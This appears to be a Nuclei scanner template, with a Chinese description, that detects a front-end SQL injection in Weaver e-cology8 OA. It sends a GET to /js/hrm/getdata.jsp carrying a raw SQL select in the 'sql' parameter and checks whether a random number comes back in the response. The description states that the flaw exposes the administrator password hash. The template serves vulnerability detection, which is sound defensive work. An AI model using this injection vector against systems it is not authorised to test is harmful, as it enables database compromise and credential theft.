id: ecology-v8-sqli
info:
  name: 泛微e-cology8前台sql注入
  author:
  - l0ne1y
  description: |-
    泛微e-cology8前台sql注入
    SQL是一种数据库查询和程序设计语言，用于存取数据以及查询、更新和管理关系数据库系统，同时也是数据库脚本文件的扩展名。
    在Web程序中，通常会使用SQL指令来查询、更新数据库数据，通常查询或者更新数据会带有一些条件，而这些条件通常是提供给用户输入的，那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据，甚至在数据库账号权限较高的情况下，可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。
    泛微ecology8是⼀款OA办公产品，但ecology8中存在前台SQL注⼊，可获取系统管理员密码hash。
  severity: high
  remediation: |-
    #### 官方修复方案：
    升级系统至无漏洞版本，或于官网下载安全补丁。
requests:
- matchers:
  - type: word
    part: body
    words:
    - '{{randomValue}}'
  path:
  - '{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{randomValue}}+as+id'
  method: GET
  headers:
    Host: '{{Hostname}}'
variables:
  randomValue: '{{rand_int(200000000, 210000000)}}'
